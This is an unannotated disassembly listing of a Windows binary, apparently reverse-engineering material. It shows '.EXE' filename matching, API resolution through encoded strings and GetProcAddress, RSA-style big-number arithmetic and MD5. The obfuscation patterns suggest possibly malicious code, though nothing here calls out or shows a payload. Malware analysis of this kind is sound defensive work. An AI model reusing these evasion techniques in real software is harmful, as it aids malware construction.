add ebx, esi
movzx esi, [ebp+ebx+var_1FFF]
movzx esi, si
shl esi, 8
mov ebx, edx
or ebx, esi
mov esi, ebx
movzx esi, si
mov ebx, eax
add ebx, esi
mov esi, ebx
mov [ebp+var_1210C], si
movzx eax, [ebp+var_1210C]
lea eax, [ebp+eax+var_1FFF]
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_445970
lea ecx, [ebp+var_11FFE]
or eax, 0FFFFFFFFh
loc_444CC3: ; CODE XREF: sub_444ACE+1FA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_444CC3
mov edi, eax
movsx eax, word_44D120
add eax, dword_44D1E4
sub eax, 6
mov edx, edi
sub edx, eax
cmp [ebp+edx+var_11FFE], 2Eh
jnz short loc_444D5B
mov eax, dword_44D1F8
add eax, dword_44D24C
sub eax, 0Ch
mov edx, edi
sub edx, eax
movsx eax, [ebp+edx+var_11FFE]
push eax
call ds:dword_446034
add esp, 4
cmp eax, 45h
jnz short loc_444D5B
mov esi, dword_44D104
sub esi, 2
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call ds:dword_446034
add esp, 4
cmp eax, 58h
jnz short loc_444D5B
mov esi, dword_44D168
sub esi, 8
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call ds:dword_446034
add esp, 4
cmp eax, 45h
jz short loc_444D5D
loc_444D5B: ; CODE XREF: sub_444ACE+21A�j
; sub_444ACE+243�j ...
jmp short loc_444D93
; ---------------------------------------------------------------------------
loc_444D5D: ; CODE XREF: sub_444ACE+28B�j
push offset word_44D85A
call sub_43AC82
push eax
lea edi, [ebp+var_11FFE]
push edi
call ds:dword_446024
mov eax, dword_44D1AC
add eax, dword_44D0F0
sub eax, 5
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_4433F9
add esp, 14h
loc_444D93: ; CODE XREF: sub_444ACE+84�j
; sub_444ACE+CA�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_444ACE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444D98 proc near ; CODE XREF: sub_43A6D4+41�p
; sub_43BB7B+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_444DAD: ; CODE XREF: sub_444D98+1A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_444DAD
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [eax]
or eax, 0FFFFFFFFh
loc_444DBF: ; CODE XREF: sub_444D98+2C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_444DBF
mov esi, eax
mov eax, dword_44D1EC
sub eax, 6
mov [ebp+var_4], eax
jmp short loc_444E31
; ---------------------------------------------------------------------------
loc_444DD5: ; CODE XREF: sub_444D98+9F�j
mov eax, dword_44D0A8
movsx edx, word_44D220
mov ebx, eax
add ebx, edx
sub ebx, 0Bh
mov eax, dword_44D1F8
movsx edx, word_44D0B4
mov edi, eax
add edi, edx
sub edi, 0Ah
jmp short loc_444E2A
; ---------------------------------------------------------------------------
loc_444DFD: ; CODE XREF: sub_444D98+94�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+edi]
cmp eax, edx
jnz short loc_444E2E
inc ebx
cmp ebx, esi
jnz short loc_444E29
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_444E29
mov eax, [ebp+var_4]
jmp short loc_444E3E
; ---------------------------------------------------------------------------
loc_444E29: ; CODE XREF: sub_444D98+7F�j
; sub_444D98+8A�j
inc edi
loc_444E2A: ; CODE XREF: sub_444D98+63�j
cmp edi, esi
jb short loc_444DFD
loc_444E2E: ; CODE XREF: sub_444D98+7A�j
inc [ebp+var_4]
loc_444E31: ; CODE XREF: sub_444D98+3B�j
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb short loc_444DD5
mov eax, 0FFFFh
loc_444E3E: ; CODE XREF: sub_444D98+8F�j
pop edi
pop esi
pop ebx
leave
retn
sub_444D98 endp
; =============== S U B R O U T I N E =======================================
sub_444E43 proc near ; CODE XREF: sub_43A39F+16�p
push edi
push offset byte_44D84D
call sub_43AC82
pop ecx
push eax
call ds:dword_449598 ; GetModuleHandleA
mov dword_44D264, eax
test eax, eax
jnz short loc_444E76
push offset dword_44D840
call sub_43AC82
pop ecx
push eax
call ds:dword_44A208 ; LoadLibraryA
mov dword_44D264, eax
loc_444E76: ; CODE XREF: sub_444E43+1A�j
push offset byte_44D82D
call sub_43AC82
push eax
push dword_44D264
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44CD98, eax
push offset byte_44D819
call sub_43AC82
push eax
push dword_44D264
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4495D4, eax
push offset byte_44D809
call sub_43AC82
push eax
push dword_44D264
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_449084, eax
push offset byte_44D7F7
call sub_43AC82
push eax
push dword_44D264
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44908C, eax
push offset dword_44D7E8
call sub_43AC82
add esp, 14h
push eax
push dword_44D264
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C824, eax
pop edi
retn
sub_444E43 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444F08 proc near ; CODE XREF: sub_43F082+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_44ED24
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_444FD3
xor edx, edx
loc_444F38: ; CODE XREF: sub_444F08+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_444F4A
mov edx, [ebp+arg_4]
call sub_444F64
loc_444F4A: ; CODE XREF: sub_444F08+38�j
lea edx, dword_44ED24
call sub_444F64
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_444F38
popa
pop ebp
retn 10h
sub_444F08 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_444F64 proc near ; CODE XREF: sub_444F08+3D�p
; sub_444F08+48�p
lea edi, dword_44ECE4
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_44ED24
call sub_444FD3
loc_444F7E: ; CODE XREF: sub_444F64+5D�j
lea edi, dword_44ECE4
mov ecx, 10h
xor eax, eax
loc_444F8B: ; CODE XREF: sub_444F64+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_444F8B
call sub_444FE4
bt dword_44ED24, ebx
jnb short loc_444FC0
mov esi, edx
lea edi, dword_44ECE4
xor eax, eax
mov ecx, 10h
loc_444FAF: ; CODE XREF: sub_444F64+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_444FAF
call sub_444FE4
loc_444FC0: ; CODE XREF: sub_444F64+3A�j
dec ebx
jns short loc_444F7E
mov edi, edx
lea esi, dword_44ECE4
mov ecx, 10h
rep movsd
retn
sub_444F64 endp
; =============== S U B R O U T I N E =======================================
sub_444FD3 proc near ; CODE XREF: sub_444F08+29�p
; sub_444F64+15�p
mov ebx, 1FFh
loc_444FD8: ; CODE XREF: sub_444FD3+B�j
bt [edi], ebx
jb short locret_444FE0
dec ebx
jnz short loc_444FD8
locret_444FE0: ; CODE XREF: sub_444FD3+8�j
retn
sub_444FD3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_444FE4 proc near ; CODE XREF: sub_444F64+2E�p
; sub_444F64+57�p
lea esi, dword_44ECE4
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_444FF2: ; CODE XREF: sub_444FE4+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_44501B
ja short loc_444FFF
dec ecx
jns short loc_444FF2
loc_444FFF: ; CODE XREF: sub_444FE4+16�j
mov esi, [ebp+14h]
lea edi, dword_44ECE4
xor eax, eax
mov ecx, 10h
loc_44500F: ; CODE XREF: sub_444FE4+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_44500F
locret_44501B: ; CODE XREF: sub_444FE4+14�j
retn
sub_444FE4 endp
; =============== S U B R O U T I N E =======================================
sub_44501C proc near ; CODE XREF: sub_44506D+32�p
; sub_44506D+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_44501C endp
; =============== S U B R O U T I N E =======================================
sub_445029 proc near ; CODE XREF: sub_44506D+219�p
; sub_44506D+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_445029 endp
; =============== S U B R O U T I N E =======================================
sub_445036 proc near ; CODE XREF: sub_44506D+420�p
; sub_44506D+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_445036 endp
; =============== S U B R O U T I N E =======================================
sub_44503D proc near ; CODE XREF: sub_44506D+627�p
; sub_44506D+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_44503D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_445046 proc near ; CODE XREF: sub_43F09C+73�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_445046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44506D proc near ; CODE XREF: sub_43F09C+8C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_44ED64, eax
mov eax, [edi+4]
mov dword_44ED68, eax
mov eax, [edi+8]
mov dword_44ED6C, eax
mov eax, [edi+0Ch]
mov dword_44ED70, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44501C
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44501C
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44501C
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44501C
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44501C
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44501C
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44501C
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44501C
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44501C
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44501C
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44501C
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44501C
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44501C
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44501C
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44501C
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_445029
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_445029
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_445029
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_445029
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_445029
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_445029
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_445029
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_445029
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_445029
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_445029
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_445029
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_445029
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_445029
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_445029
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_445029
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_445029
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_445036
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_445036
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_445036
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_445036
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_445036
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_445036
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_445036
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_445036
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_445036
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_445036
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_445036
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_445036
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_445036
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_445036
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_445036
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_445036
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44503D
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44503D
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44503D
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44503D
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44503D
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44503D
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44503D
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44503D
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44503D
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44503D
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44503D
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44503D
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44503D
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44503D
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44503D
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44503D
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_44ED64
add [edi], eax
mov eax, dword_44ED68
add [edi+4], eax
mov eax, dword_44ED6C
add [edi+8], eax
mov eax, dword_44ED70
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_44506D endp
; =============== S U B R O U T I N E =======================================
sub_4458B8 proc near ; CODE XREF: sub_4458D5+1E�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_4458B9: ; CODE XREF: sub_4458B8+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_4458B9
sub esp, eax
test [esp+0FFCh+var_FFC], eax
push ecx
retn
sub_4458B8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4458D5 proc near ; CODE XREF: sub_43BC02+3A�p
arg_0 = dword ptr 4
pop ecx
pop eax
add eax, 3
shr eax, 2
shl eax, 2
cmp eax, 1000h
jl short loc_445905
mov edx, esp
push eax
fild [esp-4+arg_0]
mov [esp-4+arg_0], ecx
fild [esp-4+arg_0]
call sub_4458B8
mov esp, edx
push edx
fistp dword ptr [esp+0]
mov ecx, [esp+0]
fistp dword ptr [esp+0]
pop eax
loc_445905: ; CODE XREF: sub_4458D5+10�j
sub esp, eax
mov eax, esp
mov dword ptr [eax], 0
push ecx
push ecx
retn
sub_4458D5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_445914 proc near ; CODE XREF: .text:0043A1BA�p
; DATA XREF: .data:off_44D000�o
xor eax, eax
inc eax
retn 0Ch
sub_445914 endp
; ---------------------------------------------------------------------------
align 4
push eax
fnstcw word ptr [esp]
mov eax, [esp]
btr dword ptr [esp], 8
or word ptr [esp], 200h
; START OF FUNCTION CHUNK FOR sub_44593F
loc_44592E: ; CODE XREF: sub_44593F+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
loc_445932: ; CODE XREF: .text:0044593D�j
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_44593F
; ---------------------------------------------------------------------------
push eax
fnstcw word ptr [esp]
pop eax
jmp short loc_445932
; =============== S U B R O U T I N E =======================================
sub_44593F proc near ; CODE XREF: .text:loc_43A1A7�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044592E SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_44592E
sub_44593F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_445950 proc near ; CODE XREF: sub_43A6D4+8�p
; sub_43BB7B+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_445951: ; CODE XREF: sub_445950+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_445951
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_445950 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_445970 proc near ; CODE XREF: sub_43BE21+28B�p
; sub_43BE21+890�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_445970 endp
; ---------------------------------------------------------------------------
align 4
jmp ds:dword_44F0AC
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4459A8 proc near ; CODE XREF: sub_43A25C+10�p
jmp ds:dword_44F0B0
sub_4459A8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4459B4 proc near ; CODE XREF: sub_43A080+13�p
jmp ds:dword_44F0B4
sub_4459B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4459C0 proc near ; CODE XREF: sub_43A1C3+33�p
; sub_43A1C3+45�p ...
jmp ds:dword_44F0C0
sub_4459C0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4459CC proc near ; CODE XREF: sub_43A1C3+B�p
; sub_43A1C3+17�p ...
jmp ds:dword_44F0C4
sub_4459CC endp
; ---------------------------------------------------------------------------
align 8
jmp ds:dword_44F0C8
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
